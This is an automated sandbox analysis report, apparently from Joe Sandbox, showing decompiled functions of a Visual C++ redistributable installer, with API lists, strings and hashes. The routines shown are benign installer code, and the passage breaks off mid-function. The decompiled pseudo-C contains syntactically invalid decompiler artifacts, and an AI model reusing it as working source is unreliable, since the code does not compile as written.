                                                                          Uniqueness Score: -1.00%

                                                                          Function 000309B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E000309B8(intOrPtr _a4, intOrPtr _a8) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				intOrPtr _t23;
				void* _t35;
				intOrPtr _t43;
				signed int _t44;

				_t43 = _a4;
				_t44 = 0;
				_v20.dwLowDateTime = 0;
				_v20.dwHighDateTime = 0;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				_t23 =  *((intOrPtr*)(_t43 + 0x2c));
				if(_t23 == 0) {
					if(DosDateTimeToFileTime( *(_a8 + 0x18) & 0x0000ffff,  *(_a8 + 0x1a) & 0x0000ffff,  &_v20) != 0 && LocalFileTimeToFileTime( &_v20,  &_v12) != 0) {
						SetFileTime( *(_t43 + 0x3c),  &_v12,  &_v12,  &_v12);
					}
					if( *(_t43 + 0x3c) != 0xffffffff) {
						CloseHandle( *(_t43 + 0x3c));
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) | 0xffffffff;
					}
				} else {
					_t35 = _t23 - 1;
					if(_t35 != 0) {
						_t37 = _t35 == 0;
						if(_t35 == 0) {
							_t44 = 0x80004004;
						} else {
							_t44 = 0x8007139f;
							E000137D3(_t37, "cabextract.cpp", 0x296, 0x8007139f);
							_push("Invalid operation for this state.");
							_push(0x8007139f);
							E0005012F();
						}
					}
				}
				 *(_t43 + 0x30) = _t44;
				_t20 = (_t44 >> 0x0000001f & 0xfffffffe) + 1; // 0x1
				return _t20;
			}









                                                                          0x000309c0
                                                                          0x000309c3
                                                                          0x000309c5
                                                                          0x000309c8
                                                                          0x000309cb
                                                                          0x000309d2
                                                                          0x000309d5
                                                                          0x000309d8
                                                                          0x00030a2d
                                                                          0x00030a4a
                                                                          0x00030a4a
                                                                          0x00030a54
                                                                          0x00030a59
                                                                          0x00030a5f
                                                                          0x00030a5f
                                                                          0x000309da
                                                                          0x000309da
                                                                          0x000309dd
                                                                          0x000309e4
                                                                          0x000309e7
                                                                          0x00030a0d
                                                                          0x000309e9
                                                                          0x000309e9
                                                                          0x000309f9
                                                                          0x000309fe
                                                                          0x00030a03
                                                                          0x00030a04
                                                                          0x00030a0a
                                                                          0x000309e7
                                                                          0x000309dd
                                                                          0x00030a63
                                                                          0x00030a6d
                                                                          0x00030a74

                                                                          APIs
                                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00030A25
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00030A37
                                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00030A4A
                                                                          • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00030616,?,?), ref: 00030A59
                                                                          Strings
                                                                          • cabextract.cpp, xrefs: 000309F4
                                                                          • Invalid operation for this state., xrefs: 000309FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$CloseDateHandleLocal
                                                                          • String ID: Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 609741386-1751360545
                                                                          • Opcode ID: 786605869e2683164ca9674ad8d94fa21aba07521ce49a3950f56ab96ede8853
                                                                          • Instruction ID: c7e40361c8a40cd9134915cfd444d9aaba6fb7d730a046ce00139974441a1076
                                                                          • Opcode Fuzzy Hash: 786605869e2683164ca9674ad8d94fa21aba07521ce49a3950f56ab96ede8853
                                                                          • Instruction Fuzzy Hash: FC21C37290171AABCB509FA8EC588EA7BBCFF04721F144216F811E65D0D775EA11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00024880 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 67fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00024880(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12, long _a16) {
				char _v8;
				long _v12;
				long _t35;
				void* _t38;

				_t35 = 0;
				_v12 = 0;
				_v8 = 0;
				_t38 = E0002444C(_a8, _a12, _a16,  &_v12,  &_v8);
				if(_t38 >= 0) {
					_a16 = 0;
					if(_v8 > 0) {
						while(WriteFile(_a4, _v12, _v8 - _t35,  &_a16, 0) != 0) {
							_t35 = _t35 + _a16;
							if(_t35 < _v8) {
								continue;
							} else {
							}
							goto L8;
						}
						_t42 =  <=  ? GetLastError() : _t27 & 0x0000ffff | 0x80070000;
						_t38 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t27 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "pipe.cpp", 0x2f0, _t38);
						_push("Failed to write message type to pipe.");
						goto L7;
					}
				} else {
					_push("Failed to allocate message to write.");
					L7:
					_push(_t38);
					E0005012F();
				}
				L8:
				if(_v12 != 0) {
					E00013999(_v12);
				}
				return _t38;
			}







                                                                          0x0002488a
                                                                          0x00024890
                                                                          0x00024897
                                                                          0x000248a5
                                                                          0x000248a9
                                                                          0x000248b2
                                                                          0x000248b8
                                                                          0x000248ba
                                                                          0x000248d6
                                                                          0x000248dc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000248de
                                                                          0x00000000
                                                                          0x000248dc
                                                                          0x000248f1
                                                                          0x000248fb
                                                                          0x00024909
                                                                          0x0002490e
                                                                          0x00000000
                                                                          0x0002490e
                                                                          0x000248ab
                                                                          0x000248ab
                                                                          0x00024913
                                                                          0x00024913
                                                                          0x00024914
                                                                          0x0002491a
                                                                          0x0002491b
                                                                          0x0002491f
                                                                          0x00024924
                                                                          0x00024924
                                                                          0x00024930

                                                                          APIs
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,000251A4), ref: 000248CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID: @Met$Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
                                                                          • API String ID: 3934441357-1307148864
                                                                          • Opcode ID: ee096a0df4d6f8f9daa4800359df0ef01ef16a5cf0880c97776efaf427b71ffa
                                                                          • Instruction ID: 0c8645f4d25754f71016e03e8373c4aa2dd5b71420a9bd60266f43b81f802431
                                                                          • Opcode Fuzzy Hash: ee096a0df4d6f8f9daa4800359df0ef01ef16a5cf0880c97776efaf427b71ffa
                                                                          • Instruction Fuzzy Hash: E811AF72A00229BEEB21DF95ED05ADF7BE9EF40340F110126FC04A6150D7709E50D6A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00028003 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00028C10,0000001A,00000000,?,00000000,00000000), ref: 0002804C
                                                                          • GetLastError.KERNEL32(?,?,00028C10,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 00028056
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                          • String ID: @Met$Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                          • API String ID: 2186923214-3279289152
                                                                          • Opcode ID: 7924ddf2aa5aca0ceacede8b9e7e17dceb4954f61af08ccf1497efe1f0788d46
                                                                          • Instruction ID: 7fcfc13f41734af2da077eb9e088e17ae605482c9695d993a5c410c78ddeca2e
                                                                          • Opcode Fuzzy Hash: 7924ddf2aa5aca0ceacede8b9e7e17dceb4954f61af08ccf1497efe1f0788d46
                                                                          • Instruction Fuzzy Hash: 58016B766457307AE7306669AC06EEB7ADDCF40B60F11801AFE04EB181EE658E0042E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002444C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 67%
                                                                          			E0002444C(char _a4, intOrPtr _a8, char _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _t17;
				intOrPtr _t31;
				intOrPtr _t37;
				void* _t38;

				_t38 = 0;
				_t17 =  ==  ? 0 : _a12;
				_a12 = _t17;
				_t37 = _t17 + 8;
				_t31 = E000138D4(_t37, 0);
				if(_t31 != 0) {
					E00031664(_t31, _t37,  &_a4, 4);
					_t7 = _t37 - 4; // 0x5b504
					_t8 = _t31 + 4; // 0x4
					E00031664(_t8, _t7,  &_a12, 4);
					if(_a12 != 0) {
						_t11 = _t37 - 8; // 0x5b500
						_t13 = _t31 + 8; // 0x8
						E00031664(_t13, _t11, _a8, _a12);
					}
					 *_a20 = _t37;
					 *_a16 = _t31;
				} else {
					_t38 = 0x8007000e;
					E000137D3(_t18, "pipe.cpp", 0x2be, 0x8007000e);
					_push("Failed to allocate memory for message.");
					_push(0x8007000e);
					E0005012F();
				}
				return _t38;
			}







                                                                          0x00024456
                                                                          0x0002445c
                                                                          0x00024460
                                                                          0x00024463
                                                                          0x0002446c
                                                                          0x00024470
                                                                          0x0002449e
                                                                          0x000244a9
                                                                          0x000244ad
                                                                          0x000244b1
                                                                          0x000244bc
                                                                          0x000244c1
                                                                          0x000244c8
                                                                          0x000244cc
                                                                          0x000244d1
                                                                          0x000244d7
                                                                          0x000244dc
                                                                          0x00024472
                                                                          0x00024472
                                                                          0x00024482
                                                                          0x00024487
                                                                          0x0002448c
                                                                          0x0002448d
                                                                          0x00024493
                                                                          0x000244e4

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • _memcpy_s.LIBCMT ref: 0002449E
                                                                          • _memcpy_s.LIBCMT ref: 000244B1
                                                                          • _memcpy_s.LIBCMT ref: 000244CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s$Heap$AllocateProcess
                                                                          • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                          • API String ID: 886498622-766083570
                                                                          • Opcode ID: 00672b2342fb54963646b72b8b05d89f2ca793909e34862d71d10a989039e8d6
                                                                          • Instruction ID: bf0cd13dd0df4b3864d98b29120766d5e5b529deba6d51462066cc47df021434
                                                                          • Opcode Fuzzy Hash: 00672b2342fb54963646b72b8b05d89f2ca793909e34862d71d10a989039e8d6
                                                                          • Instruction Fuzzy Hash: D01151B260031DABDB01AF94DC86DDBB3ADEF09710F00452AFA019B142EB70DA54C7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003DB67 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 70%
                                                                          			E0003DB67(void* __ecx, intOrPtr _a4) {
				void* _v8;
				struct tagMSG _v36;
				void* _t13;
				void* _t15;
				signed short _t19;
				void* _t24;
				signed int _t26;
				struct HWND__* _t33;

				_t24 = __ecx;
				_t33 = 0;
				_t26 = 7;
				_v8 =  *((intOrPtr*)(__ecx + 0x28));
				memset( &_v36, 0, _t26 << 2);
				while(1) {
					_t13 = MsgWaitForMultipleObjects(1,  &_v8, _t33, 0x3e8, 0x4ff) - _t33;
					if(_t13 == 0) {
						break;
					}
					_t15 = _t13 - 1;
					if(_t15 == 0) {
						PeekMessageW( &_v36, _t33, _t33, _t33, _t33);
						continue;
					} else {
						if(_t15 != 0x101) {
							_t19 = GetLastError();
							_t36 =  <=  ? _t19 : _t19 & 0x0000ffff | 0x80070000;
							_t33 =  >=  ? 0x80004005 :  <=  ? _t19 : _t19 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "bitsengine.cpp", 0xc4, _t33);
							_push("Failed while waiting for download.");
							_push(_t33);
							E0005012F();
						} else {
							E0003DA45(_t24, _a4);
							continue;
						}
					}
					break;
				}
				return _t33;
			}











                                                                          0x0003db6f
                                                                          0x0003db71
                                                                          0x0003db76
                                                                          0x0003db7d
                                                                          0x0003db82
                                                                          0x0003db84
                                                                          0x0003db9b
                                                                          0x0003db9d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003db9f
                                                                          0x0003dba2
                                                                          0x0003dbbf
                                                                          0x00000000
                                                                          0x0003dba4
                                                                          0x0003dba9
                                                                          0x0003dbc7
                                                                          0x0003dbd8
                                                                          0x0003dbe2
                                                                          0x0003dbf0
                                                                          0x0003dbf5
                                                                          0x0003dbfa
                                                                          0x0003dbfb
                                                                          0x0003dbab
                                                                          0x0003dbb0
                                                                          0x00000000
                                                                          0x0003dbb0
                                                                          0x0003dba9
                                                                          0x00000000
                                                                          0x0003dba2
                                                                          0x0003dc0a

                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32 ref: 0003DB95
                                                                          • PeekMessageW.USER32 ref: 0003DBBF
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0003DD8F,00000000,?,?,?,00000001,00000000), ref: 0003DBC7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                          • String ID: @Met$Failed while waiting for download.$bitsuser.cpp
                                                                          • API String ID: 435350009-1341489405
                                                                          • Opcode ID: f3ab3f22d054e8dd01705f8d986105a0656406734f3443844f8be62c83254c8e
                                                                          • Instruction ID: 46615a2bdd67d1b0de886a9fc378dca357ec8eeafc2ccbcddf10e82da08982d3
                                                                          • Opcode Fuzzy Hash: f3ab3f22d054e8dd01705f8d986105a0656406734f3443844f8be62c83254c8e
                                                                          • Instruction Fuzzy Hash: 59110C73B45325BBE7215AB9AC45EDFBBECEF04721F010126FE05E61C0D6649E0085E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053B4A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00053B4A(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				struct _SHELLEXECUTEINFOW _v64;
				void* _t31;
				intOrPtr* _t38;
				void* _t40;

				_t40 = 0;
				E0003F670(__edi,  &_v64, 0, 0x3c);
				_v64.hwnd = _a24;
				_v64.lpVerb = _a12;
				_v64.lpFile = _a4;
				_v64.lpParameters = _a8;
				_v64.lpDirectory = _a16;
				_v64.nShow = _a20;
				_v64.cbSize = 0x3c;
				_v64.fMask = 0x540;
				if(ShellExecuteExW( &_v64) != 0) {
					_t38 = _a28;
					if(_t38 == 0) {
						goto L2;
					} else {
						 *_t38 = _v64.hProcess;
						_t31 = 0;
						_v64.hProcess = 0;
					}
				} else {
					_t43 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
					_t40 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "shelutil.cpp", 0x3a, _t40);
					L2:
					_t31 = _v64.hProcess;
				}
				if(_t31 != 0) {
					CloseHandle(_t31);
				}
				return _t40;
			}







                                                                          0x00053b53
                                                                          0x00053b5a
                                                                          0x00053b65
                                                                          0x00053b6b
                                                                          0x00053b71
                                                                          0x00053b77
                                                                          0x00053b7d
                                                                          0x00053b83
                                                                          0x00053b8a
                                                                          0x00053b91
                                                                          0x00053ba0
                                                                          0x00053be4
                                                                          0x00053be9
                                                                          0x00000000
                                                                          0x00053beb
                                                                          0x00053bee
                                                                          0x00053bf0
                                                                          0x00053bf2
                                                                          0x00053bf2
                                                                          0x00053ba2
                                                                          0x00053bb3
                                                                          0x00053bbd
                                                                          0x00053bc8
                                                                          0x00053bcd
                                                                          0x00053bcd
                                                                          0x00053bcd
                                                                          0x00053bd2
                                                                          0x00053bd5
                                                                          0x00053bd5
                                                                          0x00053be1

                                                                          APIs
                                                                          • ShellExecuteExW.SHELL32(?), ref: 00053B98
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00053BA2
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00053BD5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorExecuteHandleLastShell
                                                                          • String ID: <$@Met$shelutil.cpp
                                                                          • API String ID: 3023784893-479485811
                                                                          • Opcode ID: 5700fa581ebdf362b976138436ad7f1c96701e95da2d2fb1f42b5a6f44470af2
                                                                          • Instruction ID: 3ce4e87d3c62c1321e6085c7ebd75df45fe8a17e52a7efe1d13ec8712f0265f6
                                                                          • Opcode Fuzzy Hash: 5700fa581ebdf362b976138436ad7f1c96701e95da2d2fb1f42b5a6f44470af2
                                                                          • Instruction Fuzzy Hash: 5F11EAB5E01219AFEB50DFA9D845ADE7BF8AF08351F004125FD09E7350E7349A148BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00015E0B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E00015E0B(void* __ebx, void* __edx, intOrPtr _a8) {
				signed int _v8;
				short _v40;
				long _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed short _t22;
				void* _t25;
				signed int _t26;
				void* _t32;
				void* _t33;
				void* _t34;
				intOrPtr _t35;
				void* _t36;
				signed int _t40;

				_t32 = __edx;
				_t25 = __ebx;
				_t10 =  *0x7a008; // 0xfbf51acb
				_v8 = _t10 ^ _t40;
				_t35 = _a8;
				_t26 = 8;
				_t33 =  &_v40;
				_v44 = 0x10;
				memset(_t33, 0, _t26 << 2);
				_t34 = _t33 + _t26;
				if(GetComputerNameW( &_v40,  &_v44) != 0) {
					_t36 = E000302F4(_t35,  &_v40, 0);
					if(_t36 < 0) {
						_push("Failed to set variant value.");
						goto L4;
					}
				} else {
					_t22 = GetLastError();
					_t39 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					_t36 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x70d, _t36);
					_push("Failed to get computer name.");
					L4:
					_push(_t36);
					E0005012F();
				}
				return E0003DE36(_t25, _v8 ^ _t40, _t32, _t34, _t36);
			}



















                                                                          0x00015e0b
                                                                          0x00015e0b
                                                                          0x00015e11
                                                                          0x00015e18
                                                                          0x00015e1c
                                                                          0x00015e24
                                                                          0x00015e25
                                                                          0x00015e28
                                                                          0x00015e2f
                                                                          0x00015e2f
                                                                          0x00015e41
                                                                          0x00015e84
                                                                          0x00015e88
                                                                          0x00015e8a
                                                                          0x00000000
                                                                          0x00015e8a
                                                                          0x00015e43
                                                                          0x00015e43
                                                                          0x00015e54
                                                                          0x00015e5e
                                                                          0x00015e6c
                                                                          0x00015e71
                                                                          0x00015e8f
                                                                          0x00015e8f
                                                                          0x00015e90
                                                                          0x00015e96
                                                                          0x00015ea8

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerErrorLastName
                                                                          • String ID: @Met$Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 3560734967-712805440
                                                                          • Opcode ID: c5a201c0c9bc17c4434bc4d74dec3408ab9bb598083ad72a7c61f81f3b61577d
                                                                          • Instruction ID: 66b22d9bb771858c76797c1ffc5d32758211544c7836aad143a967e487aee260
                                                                          • Opcode Fuzzy Hash: c5a201c0c9bc17c4434bc4d74dec3408ab9bb598083ad72a7c61f81f3b61577d
                                                                          • Instruction Fuzzy Hash: DD01E532E40728ABE710EAA49C01AEF77E8EB48711F400116FD04FB180DA74AE4886E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00016644 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E00016644(void* __ebx, void* __edx, void* __edi, intOrPtr _a8) {
				signed int _v8;
				short _v528;
				void* __esi;
				void* __ebp;
				signed int _t7;
				signed short _t18;
				void* _t21;
				void* _t26;
				intOrPtr _t28;
				void* _t29;
				signed int _t33;

				_t27 = __edi;
				_t26 = __edx;
				_t21 = __ebx;
				_t7 =  *0x7a008; // 0xfbf51acb
				_v8 = _t7 ^ _t33;
				_t28 = _a8;
				E0003F670(__edi,  &_v528, 0, 0x208);
				if(GetTempPathW(0x104,  &_v528) != 0) {
					_t29 = E000302F4(_t28,  &_v528, 0);
					if(_t29 < 0) {
						_push("Failed to set variant value.");
						goto L4;
					}
				} else {
					_t18 = GetLastError();
					_t32 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					_t29 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x757, _t29);
					_push("Failed to get temp path.");
					L4:
					_push(_t29);
					E0005012F();
				}
				return E0003DE36(_t21, _v8 ^ _t33, _t26, _t27, _t29);
			}














                                                                          0x00016644
                                                                          0x00016644
                                                                          0x00016644
                                                                          0x0001664d
                                                                          0x00016654
                                                                          0x00016658
                                                                          0x00016669
                                                                          0x00016685
                                                                          0x000166cb
                                                                          0x000166cf
                                                                          0x000166d1
                                                                          0x00000000
                                                                          0x000166d1
                                                                          0x00016687
                                                                          0x00016687
                                                                          0x00016698
                                                                          0x000166a2
                                                                          0x000166b0
                                                                          0x000166b5
                                                                          0x000166d6
                                                                          0x000166d6
                                                                          0x000166d7
                                                                          0x000166dd
                                                                          0x000166ee

                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0001667D
                                                                          • GetLastError.KERNEL32 ref: 00016687
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastPathTemp
                                                                          • String ID: @Met$Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 1238063741-1426630962
                                                                          • Opcode ID: 16c29cc182b7492b35e1facea1404faf0066791e718a653d8cd673971f16aef7
                                                                          • Instruction ID: f4e2d421c5f3919f2c39a38747374f36cbbd40ffb0bb80ccd387db6405ae3d7c
                                                                          • Opcode Fuzzy Hash: 16c29cc182b7492b35e1facea1404faf0066791e718a653d8cd673971f16aef7
                                                                          • Instruction Fuzzy Hash: C101D672F417396BF720EBA85C06FEB739C9B00711F000166FD04FB182EA659E4886D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054038 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00054038(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed char _v8;
				void* _t22;

				_v8 = _v8 | 0xffffffff;
				_t22 = 0;
				if(E00054315(_a4,  &_v8) != 0) {
					if((_v8 & 0x00000007) == 0 || SetFileAttributesW(_a4, 0x80) != 0) {
						L5:
						if(DeleteFileW(_a4) == 0) {
							_t22 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
							if(_t22 < 0) {
								_push(_t22);
								_push(0x5c2);
								goto L8;
							}
						}
					} else {
						_t22 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						if(_t22 >= 0) {
							goto L5;
						} else {
							_push(_t22);
							_push(0x5bc);
							L8:
							_push("fileutil.cpp");
							E000137D3(_t14);
						}
					}
				}
